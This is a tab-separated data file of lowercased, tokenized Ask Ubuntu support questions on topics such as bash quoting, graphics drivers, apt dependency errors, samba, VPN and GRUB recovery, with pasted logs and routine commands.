227406	bash substring syntax as a means of disambiguating environment variable identifiers	when bashing , i know that double quoting is sometimes necessary if an environment variable ( ev ) contains embedded spaces . example : `` $ jack '' rather than $ jack . sometimes it is recommended to use the syntax borrowed from substringing if the identifier of the ev is ambiguous . example , because the ev is not $ jacka , $ jackan , nor $ jackand we would use curly braces with no substring indices to write $ { jack } andjill . it seems that double quotes can accomplish the same thing . example : `` $ jack '' andjill in fact if we do nothing but echo the following demonstrates equivalence . # ! /bin/bash texas= '' asdf asdf '' florida= '' qwer '' '' $ texas '' '' qwer '' # use quotes echo $ florida alabama= '' qwer '' $ { texas } '' qwer '' # use substring without indices echo $ alabama arizona= '' qwer '' '' $ { texas } '' '' qwer '' # use both echo $ arizona maine= '' qwer '' $ texas '' qwer '' # use neither echo $ maine nevada= '' qwer '' '' $ texas '' qwer # last bit not quoted echo $ nevada idaho= '' qwer '' $ { texas } qwer # last bit not quoted echo $ idaho the output : qwerasdf asdfqwer qwerasdf asdfqwer qwerasdf asdfqwer qwerasdf asdfqwer qwerasdf asdfqwer qwerasdf asdfqwer are there bash statements/constructs where the substring trick can not be substituted with double quotes ?
227410	replace all colons from filenames with terminal	i have a gb 's worth of music on my hdd that was formatted with ext4 . i want to move these files to a fat formatted hdd partition . however , i ca n't move most of my files because they have `` : '' in the names ( for example , `` act 2 : ... .. '' for operas ) . is there a way with command line to rename all of my files from `` xxxx : xxxx '' to `` xxxx-xxxx '' ?
227414	i do n't know my passphrase	i have just installed ubuntu and i am not sure what my password is . i do n't really know that much about computers .
227416	use open vswitch without vm	the standart use of ovs is to connect host adapters with ovs and connect ovs with virtual machines adapters . but i want to use ovs as a layer between host and host 's adapters . i did n't find anything about this way of ovs use . can anybody explain how to do that or provide some links ?
227431	how to uninstall ubuntu from windows 7 ?	i have nothing against ubuntu . completely satisfied with its performance . but after some while now , i dont have much of hard disk space for my own files . so i consider having windows 7 and uninstalling ubuntu . currently i get dual booting option when i turn on my pc . i got to know that uninstalling ubuntu would result in some repair work to be done for windows 7. please detail me on this . also brief me how to uninstall ubuntu , bcoz i get an uninstall file in windows 7 in the location where i have installed ubuntu.how should i proceed on this ? ? please help me out.. thank you
227436	how to open irc : // links in empathy	whenever i click on a irc : // link in ubuntu 12.10 ( with browser firefox ) it always wants to open them in a web chat thing called mibbit . i would like to be able to open them ( in a new tab ) in empathy . could someone please instruct me on how to accomplish this ?
227438	what is so good about ubuntu , that we should choose it over windows ?	i know ubuntu is free and windows is not , but for someone who already has windows , why should he still move to ubuntu ?
227441	gnome online accounts through proxy	i am trying to set up my google account through online accounts , but all i get is the blank screen . i am behind an authenticated proxy server . i have set up the following proxy environment variables . proxy settings in the network settings dialog . proxy settings in both gconf and dconf . despite all this , i am not able to connect to my account . this has been reported in launchpad , and as per the bug report , the problem has been solved , but i am still facing problem . any help in this regard , will be highly appreciated .
227445	broken nvidia x driver	today i installed the daily updates and then a funny thing happened ... i was playing morrowind on wine , and in the game i tried to navigate to the video settings menu to adjust the brightness . i had done this before many times with no problem . as soon as i clicked `` video '' , the game silently crashed and returned me to my desktop . the funny part was that my second monitor , which normally remains `` signaled '' with a black screen , while playing morrowind , was now showing signs of `` no signal '' . a quick check in nvidia-settings showed that my second monitor stopped being detected . i thought ... ok , no big deal , i 'll just restart and everything will be ok ... wrong . upon restarting , x would not start because the nvidia driver compiled for 3.5.0-18-generic went missing , as in , it was not shown in lsmod . the monitor that had disappeared also did not come back . so i thought , ok , i must have gotten a new kernel , maybe now i have to reinstall the driver . sure enough , uname -r showed 3.5.0-19-generic , one tick newer . so i sudo apt-get remove -- purge nvidia-current-updates and then sudo apt-get install -- reinstall nvidia-current-updates . the files downloaded and the module compiled successfully with no warnings or errors . at this point , the lightdm login screen works fine across both monitors , but after logging in , i only get my desktop background image . no unity or desktop icons . the strange thing is , the x log has no errors . after a few restarts , i finally got the second monitor to come back online after physically removing my gpu and putting it back in . i 'm pretty puzzled about this whole thing , whence i ended up here . any one have any clue what 's going on ? i just want my desktop back : /
227446	need help getting ubuntu 12.10 gui working through avocent switchviewdvi ( 4 port )	i have an asus p8z77-i motherboard with an intel i3-3225 cpu , hooked up to a dell 2007fp monitor . when the comp is running through the kvm , i get an out of range error . im running the gui at 1600x12000 . its a supported resolution . i believe im having an edd problem , so i would like to hard set the montitor refresh rate to 60mhz . ive tried various posts/methods ive found on the net , but everthing either fails or doesnt work . ive even tried to run xorg -configure from the ubuntu recovery console shell , but it never completes . any ideas ?
227448	change software sources from the command line	when i want to change the mirror i am using for updates , i can open the software centre , and go to edit- > software sources , and from there select another server . this then goes through my /etc/apt/sources.list file , and replaces all the instances of the old mirror url , with the new mirror url . if , however , i want to do this on the command line ( perhaps i 'm not running x , or i 'm connecting over ssh ) , i have to go through the /etc/apt/sources.list file myself and change each instance . this is n't the hardest thing to do , and of course i can do a search and replace , but it is a lot more work than just clicking the name of the server i want , plus it requires me to know a bit about the syntax of the sources.list file , and make sure i do n't make an error while editing it . is there a command line program which can perform the same task as the software centre , and change my update mirror , without me having to edit this file ?
227450	three file not found errors before grub menu appears - caused by 12.10 upgrade	after just upgrading to 12.10 , i see three error : file not found lines flash up on the screen at the very start of bootup , just before the grub menu appears . the system still works properly after that . just wondering why , and how to fix it .
227455	nvidia g96 [ geforce 9400 gt ] and application graphic issues	i 've got a quite old nvidia graphic card and i with installed restricted drivers from settings panel ( as also shown in this thread ) . â ~ lspci 02:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9400 gt ] ( rev a1 ) i tried a lot of them : version 173-update , current , beta , but the only one that can run unity-2d it 's current-update . that 's ubuntu 12.04.1 lts 64bit . however ... unity crashes , sometimes windows border disappear , java virtual machine does n't works , font rendering it 's slow and so on . how can i solve this ? some suggestions ? thanks !
227456	`` size mismatch '' apt error when installing openjdk	when i try install openjdk-7-jre-headless i am getting the following error : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : ca-certificates-java icedtea-7-jre-jamvm java-common libcups2 libjpeg62 liblcms2-2 libnspr4 libnss3 libnss3-1d openjdk-7-jre-lib tzdata tzdata-java suggested packages : default-jre equivs cups-common liblcms2-utils libnss-mdns sun-java6-fonts ttf-dejavu-extra ttf-baekmuk ttf-unfonts ttf-unfonts-core ttf-sazanami-gothic ttf-kochi-gothic ttf-sazanami-mincho ttf-kochi-mincho ttf-wqy-microhei ttf-wqy-zenhei ttf-indic-fonts-core ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following new packages will be installed : ca-certificates-java icedtea-7-jre-jamvm java-common libcups2 libjpeg62 liblcms2-2 libnspr4 libnss3 libnss3-1d openjdk-7-jre-headless openjdk-7-jre-lib tzdata-java the following packages will be upgraded : tzdata 1 upgraded , 12 newly installed , 0 to remove and 122 not upgraded . need to get 41.2 mb/43.5 mb of archives . after this operation , 64.0 mb of additional disk space will be used . get:5 http : //in.archive.ubuntu.com/ubuntu/ oneiric/main java-common all 0.42ubuntu2 [ 62.4 kb ] fetched 41.1 mb in 4min 5s ( 167 kb/s ) failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/j/java-common/java-common_0.42ubuntu2_all.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? am unable to solve this . am i missing something ? please help me out in solving this .
227457	ifconfig not showing all ips bound to the machine	i have configured multiple ip addresses on a ubuntu box , but when i run ifconfig it shows just one of them . i am able , however , to ping all other adresses assigned to this machine . /etc/network/interface contents : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.202.11 netmask 255.255.255.0 network 192.168.202.0 broadcast 192.168.202.255 gateway 192.168.202.1 # dns-* options are implemented by the resolvconf package , if installed dns-search idil.dz1.da auto eth0:1 iface eth0:1 inet static address 192.168.202.12 netmask 255.255.255.0 auto eth0:2 iface eth0:2 inet static address 192.168.202.13 netmask 255.255.255.0 auto eth0:3 iface eth0:3 inet static address 192.168.202.14 netmask 255.255.255.0 auto eth0:4 iface eth0:4 inet static address 192.168.202.15 netmask 255.255.255.0 auto eth0:5 iface eth0:5 inet static address 192.168.202.16 netmask 255.255.255.0 however , the output of the ifconfig is only : 192.168.202.11
227458	can not copy to samba share ubuntu	i could use some help . i have no idea what is wrong : i have an ubuntu 12.04 server with samba set up . i have an ubuntu 12.10 desktop , an ubuntu 12.10 laptop and a windows 8 surface tablet . a ) the laptop or desktop try to copy a file of any size and type to the server via samba - > grey window ( freeze ) which recovers after a few seconds yet reports `` timeout '' . a file is created at the destination ( size= 0 bytes ) . the copy window progress bar never moves beyond 0 bytes . this is easily reproducible . b ) the windows 8 pc can copy files to the samba share on my ubuntu 12.04 server without problems . c ) the ubuntu 12.10 pcs can copy files to each other without problems i upgraded my server to 12.10.. still no luck . problem persists . this is really annoying since everything used to work and i have no clue why it does n't work anymore . i would really appreciate any help .
227459	unity dash search	i have my personal folders to a different partition other than home , i had a series of symlinks in my home folder pointing to the folders on the other partition . this was causing multiple entries in dash search do i modified my ~/.config/user-dirs.dirs file pointing them to the folders on the second partition . the issue is that when i search for any one of these folders in dash , i still get two entries , one pointing the folder and another that points to the /home/username/documents folder . if i click on this link i get a could not find /home/username/documents error . why is this and how do i delete these entries from dash 's records ? if deleting records is not possible , is there a way to `` reindex '' the dash search database ? i deleted the ~/.local/share/zeitgeist folder but the problem persists . how to i force `` locate '' to reindex ?
227464	record my desktop in mp4 format	how do i record my desktop interaction ( video ) and audio directly in mp4 format ? i have ubuntu 10.04 lts .
227467	how can i safely remove an external hard drive ?	two of the three icons of the drive 's partitions show on the desktop . one has disappeared and the contents are not accessible . right clicking on the desktop icon of the partition gives the option to eject . then the error message shows that the drive is busy and can not be shut down . the drive is continually pinning . kindly advise if possible how to safely remove the drive . can the lost icon of the third drive and the datd contained in it be found , please ? kind regards
227474	what packages do i install to get wine in 12.04 ?	i have ubuntu 12.04 64bit . i tried to install wine in 11.10 but met with some difficulties because of which i removed it . i tried to install assassin 's creed 1 but turned to be a catastrophe . now i want to try again . however , i am confused as to which of these packages am i to install , avoiding crashes , clashes , system failures system damage and ensuring running smooth installation of games . i need help regarding compatibility and dependency . i viewed this answer and as per the update & want the latest developing branch . update : on trying to install wine through terminal , i get this error : ved [ ~ ] > > > > sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . ved [ ~ ] > > > > sudo apt-get build-dep wine reading package lists ... done building dependency tree reading state information ... done picking 'wine1.5 ' as source package instead of 'wine' the following packages have unmet dependencies : libgl1-mesa-dev : depends : mesa-common-dev ( = 8.0.4-0ubuntu0.2 ) but it is not going to be installed depends : libgl1-mesa-glx ( = 8.0.4-0ubuntu0.2 ) but 9.1~git20121025.86cd77d0-0ubuntu0ricotz2~precise is to be installed libglu1-mesa-dev : depends : libglu1-mesa ( = 8.0.4-0ubuntu0.2 ) but 9.0.0-0ubuntu1~precise1 is to be installed e : build-dependencies for wine could not be satisfied . i tried to install dependencies but no success . also , sudo apt-get -f install did n't work . if i run sudo apt-get -f install wine1.5 , it gives unmet dependency as the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.20-0ubuntu2 ) e : unable to correct problems , you have held broken packages . and on attempting to install wine1.5-i386 , the following packages have unmet dependencies : wine1.5-i386 : i386 : depends : libgl1-mesa-glx : i386 but it is not going to be installed or libgl1 : i386 depends : libglu1-mesa : i386 but it is not going to be installed or libglu1 : i386 e : unable to correct problems , you have held broken packages . what else do i do ?
227481	booting recovery partition using grub2	i tried to install kubuntu on my lenovo x230 recently , where i managed to wipe out the whole win7 partition . i would like to have a dualboot setup on my laptop , and i 'm in need of some help ; is it possible to boot directly from the recovery partition ?
227483	how can i upgrade ubuntu 12.04 to 12.10 ?	i am using ubuntu 12.04 lts and want to upgrade it to 12.10 . please send me step by step info for this process . will my personal data be lost ? if yes , then how to protect it ?
227487	horizontal line across screen at startup	i recently ran an upgrade from 12.04 to 12.10 and was using nvidia current tested drivers and all seemed ok at first . then suddenly every time i started the computer and shutdown , the graphical plymouth logo changed to text.the only changes i made to try to correct this issue were ; sudo apt-get -- purge remove nvidia-current nvidia-settings sudo apt-get -- purge autoremove sudo apt-get clean sudo apt-get update sudo apt-get install nvidia-current and this made no change at all to the display . then i read somewhere that nouveau drivers may be the answer , so i installed them to use instead , and hey presto , the shutdown screen displays the plymouth splash . however with startup , i get a stable purple screen , for a while , and than a thick black horizontal line appears , really ugly-looking , and then the loging screen appears to be ok. can i correct the login screen same as the shutdown screen ?
227488	error trying to upgrade from 10.04.4 to 12.04	today i wanted to upgrade to 12.04 and i checked my update manager . but it it not showing the upgrade option . how can i upgrade ? im using 10.04.4
227493	ssh client times out to some servers , works on others	i have a strange problem and i 'm not sure where to begin . my ssh client works on some servers but times out on others . obviously , i checked that the servers are accessible via ssh from other locations . from my machine a i can log on to c only by logging on to b first . there are at least two servers for which this is the case . to make matters more strange sudo ufw status - > status : inactive nmap -st -p 22 < problem_server > - > ... 22/tcp open ssh ... on one affected server i am getting : ssh_exchange_identification : connection closed by remote host and on the other i am getting ssh : connect to host < problem_server > port 22 : connection timed out with both of these servers i can log in from other machines . how can i troubleshoot such a problem ?
227496	how to install wvdial without getting the following error ?	when i ran the command : sudo apt-get install wvdial i got this error message : error p @ p : ~ $ sudo apt-get install wvdial reading package lists ... done building dependency tree reading state information ... done package wvdial is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package wvdial has no installation candidate p @ p : ~ $ so how can i install wvdial ? bsnl evdo rev a usb data card model no . : t-u500 i do n't have access to internet from ubuntu for direct installation . after i posted this question i got how to install wvdial and i installed it . now i am facing another problem . i first took terminal and typed in lsusb after plugging my modem ( bsnl evdo data card ) . then i typed wvdialconf and i got the following : at @ at-presario-v3700-notebook-pc : ~ $ lsusb bus 005 device 002 : id 15eb:7153 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub at @ at-presario-v3700-notebook-pc : ~ $ wvdialconf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . ttys0 < info > : permission denied modem port scan < *1 > : s0 ttys1 < info > : permission denied modem port scan < *1 > : s1 ttys2 < info > : permission denied modem port scan < *1 > : s2 ! ! cut ! ! ! ttys31 < info > : permission denied modem port scan < *1 > : s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial can you help me in this ? i want to install my modem .
227497	avconv ac3 to aac or mp3 is not synced with video	i 'm trying to convert a mpeg2 file to h264/aac . no problem about video , but when i convert audio : ac3 , 48000 hz , stereo , s16 , 255 kb/s to mp3 or aac , with any bitrate , the sound is not synced with the video . the sound is in advanced to video when i play it . how to fix it please ? more information : the source video is 1h30 long and 3,4 gio .
227498	set webcam on different usb bus	my objective is to capture from two webcams simultaneously at a resolution of 640x480 . i am currently experiencing a problem where my two webcams are plugged in different usb ports but are using the same usb bus . therefore , i get the following error libv4l2 : error turning on stream : no space left on device vidioc_streamon : no space left on device and not able to capture from both cameras at 640x480 . i would therefore like to be able to set each logitech webcam on a different bus , which i believe would then allow me to capture from both webcams simultaneously . this is what the output of lsusb shows bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 05ca:18b0 ricoh co. , ltd sony vaio integrated webcam bus 003 device 002 : id 147e:1000 upek biometric touchchip/touchstrip fingerprint sensor bus 002 device 012 : id 046d:0821 logitech , inc. hd webcam c910 bus 002 device 007 : id 046d:0991 logitech , inc. quickcam pro for notebooks is there a way to set each webcam to use a different usb bus ?
227502	where are steam games installed ?	hy ! i want to buy a new notebook in the near future to play games on it . i 'm looking forward for the new steam for linux client . my question is that where does the steam install the games , on the home partition , or in the usr folder , or somewhere else ? ( i 'm not a steam for linux beta user )
227509	dash home - `` rdesktop < address > '' opens firefox	i 'm on ubuntu 12.04 lts using unity . when i go to dash home ( either by clicking the icon or pressing the `` windows '' key ) , and try to run rdesktop , it does n't work - it either : it either says `` sorry , there is nothing that matches your search '' and does nothing , or opens a new firefox window on a blank page . rdesktop works fine from the command-line , and i think it used to work ok from dash as well , but i could n't swear to that . does anybody have any idea what 's happening here ? thanks john g
227511	vpn ( sort of ) works in 12.04 but fails in 12.10 with the same settings	my university uses a vpn system for internet connections . a couple of days ago i installed 12.04 on my computer and set up the vpn following a guide specific to linux here . it would work quite well , but disconnect every now and then , especially when i checked for new updates . after a few reconnections however , it would become stable until i powered down the computer . on upgrading to 12.10 , the vpn would connect and then fail instantly whenever any network activity was attempted ( checking for updates , loading a web page etc ) . i have now reverted back to 12.04 with a fresh install . so i guess what i 'm asking for is a bit of help as to what i should do next . reinstall 12.10 and see if the issue disappears ? visit the university 's it helpdesk ? my vpn settings are exactly the same as on their guide . the vpn worked flawlessly with windows installed . the computer is a hp dc7100 sff . any help would be much appreciated thanks in advance oli
227512	how to remove grub rescue prompt after deleting ubuntu partition ?	i had a windows 7 pc dual booting with windows xp and then i got hold of ubuntu 12.10 and i installed it alongside windows 7 and after installing on boot i got gnu grub interfering in my bootloader and after some days i by mistake formatted the parttion now my pc does not boot and shows grub rescue
227515	terminal warning when opening a file in gedit	i am getting the following error when running this command line : sudo /etc/ddclient.conf i installed ddclient by : sudo apt-get install ddclient it does open the editor with the file in question , but what does the error mean ? ** ( gedit:4090 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-cswf9rwiyx : connection refused thank you
227516	which software to use for cleaning up files and increase performance of a computer under ubuntu ?	i am looking for a sofware that would clean up registry , temporary and log files on ubuntu . is there an equivalent to the windows ccleaner freeware ? cheers
227521	ugly/inconsistent theming in ubuntu gnome 12.10	some applications are displaying really ugly widgets and menus . i think it 's a gtk issue and perhaps more particularly , only applies to gtk2 apps but i 'm not sure . the numerous questions on here that deal with gtk2 v gtk3 themes do not answer my problem . here is my situation : i 'm using ubuntu gnome with gnome shell ( installed using the `` upgrade '' instructions , rather than fresh install ) with the default adwaita theme the reason i did an upgrade instead of fresh install is because i 'm on a macbook air and there is no mac image/iso for ubuntu gnome previously , i did a fresh install of ubuntu gnome 12.10 and had no theming problems now , apps like nautilus , rhythmbox , brasero , even third-party ones like lightread look exactly as expected but other apps , including firefox , inkscape , gimp , libreoffice look awful . some examples : firefox with ugly location bar : http : //ubuntuone.com/3e2x0jta4ct4afc4303u9c vs nautilus location bar : http : //ubuntuone.com/3tbhwwunmcjnlpi4ipjiuo gimp file dialogue ( like windows 95 ! ) : http : //ubuntuone.com/4ioccqq3flgo7zawgahfwy vs the rhythmbox file dialogue ( correct ) : http : //ubuntuone.com/2xlplcobvqnyeqdstgdgxq menus in libreoffice ( very bad for usability ) : http : //ubuntuone.com/26wtaez4pmgmiitgesmbjz vs menus in rhythmbox : http : //ubuntuone.com/4ib4thmlqohsle6j5kevui i 've been searching for a solution to this problem for some time . the logical explanation is that all the gtk3 apps are working and anything that is still using gtk2 is not . if that 's the case though , why did the same installation ( ubuntu gnome 12.10 ) and the same theme ( adwaita ) previously work with all those gtk2 apps ? desperate for help !
227525	how connect to a ssh server from nautilus on startup automatically ?	i try to connect to the server from the startup automatically . how could i do it to see the server files on nautilus ?
227532	adjusting touchpad drag threshold ?	i find my self constantly dragging text , links , icons , and other things a few pixels by accident . can i somehow increase the drag threshold ? i thought at first it was because i use a trackpad , but i get the same unwanted behavior with a plain old mouse . i am using mostly unity and sometimes gnome in ubuntu 12.10 .
227535	block a specific url , not all domain	as the title says , is there a way to block a specific url and not the whole domain ? let 's say i want to block google images ( google.com/imghp ) but not google ( google.com ) or block facebook groups ( facebook.com/groups/ ) but not facebook ( facebook.com ) . i have tried with opendns and the host file but ca n't still find a solution to this .
227536	replace /etc after reinstallation	i reinstalled ubuntu 12.04 after a corruption caused by a faulty operation ( not much interesting but you can read about it ) . the old system had three partitions , one for boot , one for / and one for home . i followed these instructions to restore the system keeping my home dir . basically what i did was : full backup of the old disc using dd export the list of installed packages in the old system reinstall ubuntu 12.04 not formatting the partition containing home directories reinstall the packages i had in the old system using the list of step 1 . everything still works and most of the settings have been kept , but not all . i have my desktop icons , my firefox bookmarks , etc . but other configurations have been lost . now i 'd like to replace the /etc of the new system with the /etc of the old one - i have a copy of it - so to have the same system as before , or at least very similar . before trying by myself to swap the new /etc with the old one i 'd like to be aware of the possible issues which could arise , so to prevent bad things from happening again . any thoughts or suggestions ?
227538	sony vaio e series - sve15129cgb with ati 7570 hd : screen brightness adjustment	i have been running ubuntu for a long time now ! but since i installed it on my vaio i just ca n't adjust the brightness . the fn button does not work ( although it does work for the volume adjustment ) , and none of the scripts circulating in the forum have worked so far ! any pointers will be appreciated ! thanks people .
227544	seq24 is connected to zynaddsubfx but i ca n't get seq24 to play patterns	so i got seq24 to play sounds when i click on the piano roll but when i try to play the pattern nothing happens . it 's running through qjackctl but clicking play in seq24 isnt doing anything . i 'm using 12.10 .
227547	lubuntu is noticeably slower than windows 7	i 've recently got lubuntu , but i 've noticed it runs slower than windows 7 . i know lubuntu is said to be the lightest version of ubuntu . anyone know then why it is so slow compared to windows 7 ? i run the following hardware specs : laptop : compaq presario cq57 cpu : amd c-50 ( 1 ghz , 1 mb cache ) ram : 2gb video : ati radeon hd 6250 ( 256mb ) additional hardware information here
227549	libreoffice is losing the title of my doc files	i am using libreoffice writer 3.6.2.2 with ubuntu 12.10 amd64 , nothing special , just the standard libreoffice that comes from the standard download of 12.10 amd64 from ubuntu.com . each time i open a doc file ( ms word ) it loses the title and it displays only `` untitled 1 '' in the title and as a result when i hit the save button it ask me for a name and even when i chose the doc file format it still does not display the file in the list of the dialog so i can choose it and it forces me to retype the whole name . it seems to even lose the location of the file as well , so the save dialog does not send me to the folder the file is located . another weird behavior is that even though libreoffice opens its icon on the left bar does not show the white arrow to indicate the programm is running as it does with all the other opened programms . is this a known problem and if yes is there a fix ? i tried to google it but i have not found anyone else reporting this .
227552	running text editor as sudo uses another config	i 've created a nautilus action to edit files as sudo ( gksudo ) and the text editor that opens the file is always using a different configuration from the normal user . the same thing happen when i run sudo gedit file or sudo subl file can i fix this or it 's a security measure ?
227554	best gui client for git ?	i am using git for version control of various projects . is there easy-to-use software for navigating through commits and branches of a project and for retrieving versions ?
227560	redirect network logs from syslog to another file	i keep logging way to much info ( not needed , for now ) in my syslog , and not daily or hourly ... but instant . if i want to watch for something in my syslog i just ca n't because the network log keeps interfering . so , how can i redirect network logs to another file and/or stop logging it ? dec 10 17:01:33 user kernel : [ 8716.000587 ] mediastate is connected dec 10 17:01:33 user kernel : [ 8716.000599 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:01:33 user kernel : [ 8716.000601 ] == > rt_ioctl_giwfreq 11 dec 10 17:01:33 user kernel : [ 8716.000612 ] rt28xx_get_wireless_stats -- - > dec 10 17:01:33 user kernel : [ 8716.000615 ] < -- - rt28xx_get_wireless_stats dec 10 17:01:39 user kernel : [ 8722.000714 ] mediastate is connected dec 10 17:01:39 user kernel : [ 8722.000729 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:01:39 user kernel : [ 8722.000732 ] == > rt_ioctl_giwfreq 11 dec 10 17:01:39 user kernel : [ 8722.000747 ] rt28xx_get_wireless_stats -- - > dec 10 17:01:39 user kernel : [ 8722.000751 ] < -- - rt28xx_get_wireless_stats dec 10 17:01:44 user kernel : [ 8726.904025 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:01:45 user kernel : [ 8728.003138 ] mediastate is connected dec 10 17:01:45 user kernel : [ 8728.003153 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:01:45 user kernel : [ 8728.003157 ] == > rt_ioctl_giwfreq 11 dec 10 17:01:45 user kernel : [ 8728.003171 ] rt28xx_get_wireless_stats -- - > dec 10 17:01:45 user kernel : [ 8728.003175 ] < -- - rt28xx_get_wireless_stats dec 10 17:01:51 user kernel : [ 8734.004066 ] mediastate is connected dec 10 17:01:51 user kernel : [ 8734.004079 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:01:51 user kernel : [ 8734.004082 ] == > rt_ioctl_giwfreq 11 dec 10 17:01:51 user kernel : [ 8734.004096 ] rt28xx_get_wireless_stats -- - > dec 10 17:01:51 user kernel : [ 8734.004099 ] < -- - rt28xx_get_wireless_stats dec 10 17:01:57 user kernel : [ 8740.004108 ] mediastate is connected dec 10 17:01:57 user kernel : [ 8740.004119 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:01:57 user kernel : [ 8740.004121 ] == > rt_ioctl_giwfreq 11 dec 10 17:01:57 user kernel : [ 8740.004132 ] rt28xx_get_wireless_stats -- - > dec 10 17:01:57 user kernel : [ 8740.004135 ] < -- - rt28xx_get_wireless_stats dec 10 17:01:57 user kernel : [ 8740.436021 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:03 user kernel : [ 8746.005280 ] mediastate is connected dec 10 17:02:03 user kernel : [ 8746.005294 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:02:03 user kernel : [ 8746.005298 ] == > rt_ioctl_giwfreq 11 dec 10 17:02:03 user kernel : [ 8746.005312 ] rt28xx_get_wireless_stats -- - > dec 10 17:02:03 user kernel : [ 8746.005315 ] < -- - rt28xx_get_wireless_stats dec 10 17:02:09 user kernel : [ 8752.004790 ] mediastate is connected dec 10 17:02:09 user kernel : [ 8752.004804 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:02:09 user kernel : [ 8752.004808 ] == > rt_ioctl_giwfreq 11 dec 10 17:02:09 user kernel : [ 8752.004821 ] rt28xx_get_wireless_stats -- - > dec 10 17:02:09 user kernel : [ 8752.004825 ] < -- - rt28xx_get_wireless_stats dec 10 17:02:15 user kernel : [ 8757.984031 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:15 user kernel : [ 8758.004078 ] mediastate is connected dec 10 17:02:15 user kernel : [ 8758.004094 ] == > rt_ioctl_giwmode ( mode=2 ) dec 10 17:02:15 user kernel : [ 8758.004097 ] == > rt_ioctl_giwfreq 11 dec 10 17:02:15 user kernel : [ 8758.004112 ] rt28xx_get_wireless_stats -- - > dec 10 17:02:15 user kernel : [ 8758.004116 ] < -- - rt28xx_get_wireless_stats dec 10 17:02:16 user kernel : [ 8759.492017 ] quickdrs : txtotalcnt < = 15 , train back to original rate dec 10 17:02:19 user kernel : [ 8762.002179 ] scanning , suspend msdu transmission ... dec 10 17:02:19 user kernel : [ 8762.004291 ] mlmescanreqaction -- send psm data frame for off channel rm , scan_in_progress=1 ! dec 10 17:02:19 user kernel : [ 8762.025055 ] sync - bbp r4 to 20mhz.l dec 10 17:02:19 user kernel : [ 8762.027249 ] rt35xx : switchchannel # 1 ( rf=8 , pwr0=30 , pwr1=25 , 2t ) , n=0xf1 , k=0x02 , r=0x02 dec 10 17:02:19 user kernel : [ 8762.170206 ] rt35xx : switchchannel # 2 ( rf=8 , pwr0=30 , pwr1=25 , 2t ) , n=0xf1 , k=0x07 , r=0x02 dec 10 17:02:19 user kernel : [ 8762.318211 ] rt35xx : switchchannel # 3 ( rf=8 , pwr0=30 , pwr1=25 , 2t ) , n=0xf2 , k=0x02 , r=0x02 dec 10 17:02:19 user kernel : [ 8762.462269 ] rt35xx : switchchannel # 4 ( rf=8 , pwr0=30 , pwr1=25 , 2t ) , n=0xf2 , k=0x07 , r=0x02 dec 10 17:02:19 user kernel : [ 8762.606229 ] rt35xx : switchchannel # 5 ( rf=8 , pwr0=30 , pwr1=25 , 2t ) , n=0xf3 , k=0x02 , r=0x02 dec 10 17:02:19 user kernel : [ 8762.750202 ] rt35xx : switchchannel # 6 ( rf=8 , pwr0=30 , pwr1=25 , 2t ) , n=0xf3 , k=0x07 , r=0x02 dec 10 17:02:20 user kernel : [ 8762.894217 ] rt35xx : switchchannel # 7 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf4 , k=0x02 , r=0x02 dec 10 17:02:20 user kernel : [ 8763.038202 ] rt35xx : switchchannel # 11 ( rf=8 , pwr0=29 , pwr1=26 , 2t ) , n=0xf6 , k=0x02 , r=0x02 dec 10 17:02:20 user kernel : [ 8763.040194 ] cntlenqueueforrecv ( ) : bar-wcid ( 1 ) , tid ( 0 ) dec 10 17:02:20 user kernel : [ 8763.040199 ] bar ( 1 ) : tid ( 0 ) - 03a3:037e dec 10 17:02:20 user kernel : [ 8763.040387 ] sync - end of scan , restore to channel 11 , total bss [ 03 ] dec 10 17:02:20 user kernel : [ 8763.040400 ] scannextchannel -- send psm data frame dec 10 17:02:20 user kernel : [ 8763.040402 ] bfastroamingscan ~~~~~~~~~~~~~ get back to send data 